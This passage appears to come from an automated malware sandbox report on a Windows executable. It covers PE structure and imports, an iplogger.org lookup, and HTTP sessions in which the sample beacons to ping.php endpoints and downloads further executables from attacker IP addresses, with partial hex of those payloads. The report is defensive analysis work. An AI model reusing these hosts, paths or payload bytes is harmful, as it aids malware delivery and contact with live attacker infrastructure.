                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000xdbf60xdc00False0.486328125data5.91189843213956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .data0xf0000x181d7c0x27600False0.9501674107142857data7.869383846999812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x1910000x4bf80x4c00False0.5950349506578947data5.615847517398622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x1912b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
                                                      RT_ICON0x191b580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                                                      RT_ICON0x1941000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                                      RT_STRING0x1953a80x42data
                                                      RT_STRING0x1953f00x280data
                                                      RT_STRING0x1956700x3cedata
                                                      RT_STRING0x195a400x1b2data
                                                      RT_ACCELERATOR0x1951d80x80data
                                                      RT_GROUP_ICON0x1951a80x30data
                                                      RT_VERSION0x1952680x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                                                      None0x1952580xadata

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllLoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesW, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindCloseChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameW, IsBadWritePtr, FindResourceA, GetComputerNameExW, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, PostQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeA, WriteConsoleOutputW, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, LeaveCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
                                                      USER32.dllCharUpperBuffW
                                                      WINHTTP.dllWinHttpCreateUrl

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 3, 2022 17:20:10.000097990 CEST4970180192.168.2.7208.67.104.97
                                                      Oct 3, 2022 17:20:10.027523041 CEST8049701208.67.104.97192.168.2.7
                                                      Oct 3, 2022 17:20:10.027625084 CEST4970180192.168.2.7208.67.104.97
                                                      Oct 3, 2022 17:20:10.028326988 CEST4970180192.168.2.7208.67.104.97
                                                      Oct 3, 2022 17:20:10.055784941 CEST8049701208.67.104.97192.168.2.7
                                                      Oct 3, 2022 17:20:12.103569031 CEST8049701208.67.104.97192.168.2.7
                                                      Oct 3, 2022 17:20:12.108181953 CEST4970180192.168.2.7208.67.104.97
                                                      Oct 3, 2022 17:20:17.107115030 CEST8049701208.67.104.97192.168.2.7
                                                      Oct 3, 2022 17:20:17.107191086 CEST4970180192.168.2.7208.67.104.97
                                                      Oct 3, 2022 17:20:17.812517881 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.839587927 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.839688063 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.840679884 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.868503094 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871493101 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871527910 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871552944 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871577978 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871602058 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871625900 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871650934 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871666908 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.871676922 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871702909 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871728897 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.871731043 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.871782064 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.871814966 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.898906946 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.898948908 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.898972988 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.898997068 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899020910 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899044991 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899070024 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899077892 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899096966 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899123907 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899141073 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899152040 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899171114 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899178982 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899204969 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899218082 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899230957 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899255037 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899255991 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899282932 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899282932 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899311066 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899327993 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899353027 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899365902 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899379969 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899404049 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899405003 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899430037 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.899431944 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899456024 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.899475098 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.926457882 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926501036 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926539898 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.926579952 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.926587105 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926652908 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.926692009 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926748037 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.926752090 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926780939 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926793098 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.926822901 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.926867962 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926913977 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.926947117 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926973104 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.926986933 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927000046 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927025080 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927026033 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927042961 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927054882 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927079916 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927087069 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927105904 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927108049 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927134991 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927135944 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927160025 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927160978 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927187920 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927189112 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927216053 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927216053 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927229881 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927246094 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927261114 CEST4970280192.168.2.785.31.46.167
                                                      Oct 3, 2022 17:20:17.927273035 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927297115 CEST804970285.31.46.167192.168.2.7
                                                      Oct 3, 2022 17:20:17.927299976 CEST4970280192.168.2.785.31.46.167

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 3, 2022 17:21:06.195020914 CEST5575253192.168.2.78.8.8.8
                                                      Oct 3, 2022 17:21:06.214745998 CEST53557528.8.8.8192.168.2.7

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 3, 2022 17:21:06.195020914 CEST192.168.2.78.8.8.80x6a79Standard query (0)iplogger.orgA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 3, 2022 17:21:06.214745998 CEST8.8.8.8192.168.2.70x6a79No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • 208.67.104.97
                                                      • 85.31.46.167
                                                      • 107.182.129.235
                                                      • 171.22.30.106

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.749701208.67.104.9780C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:20:10.028326988 CEST0OUTGET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 208.67.104.97
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:12.103569031 CEST0INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:10 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.74970285.31.46.16780C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:20:17.840679884 CEST1OUTGET /software.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: D
                                                      Host: 85.31.46.167
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:17.871493101 CEST3INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:17 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="dll";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 242176
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{
                                                      Oct 3, 2022 17:20:18.108552933 CEST259OUTGET /software.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: E
                                                      Host: 85.31.46.167
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:18.141302109 CEST260INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:18 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="soft";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 3947920
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ ``TO 2(<@8 H.text `.rsrc2 @@.reloc@@BHh@ET;(*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.749703208.67.104.9780C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:20:39.153733015 CEST4437OUTGET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 208.67.104.97
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:41.156639099 CEST4437INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:39 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.749704107.182.129.23580C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:20:41.232367992 CEST4438OUTGET /storage/ping.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 0
                                                      Host: 107.182.129.235
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:41.259840965 CEST4438INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:41 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 17
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55
                                                      Data Ascii: UwUoooIIrwgh24uuU
                                                      Oct 3, 2022 17:20:41.313606024 CEST4439OUTGET /storage/extension.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 107.182.129.235
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:20:41.342122078 CEST4440INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:20:41 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 94224
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
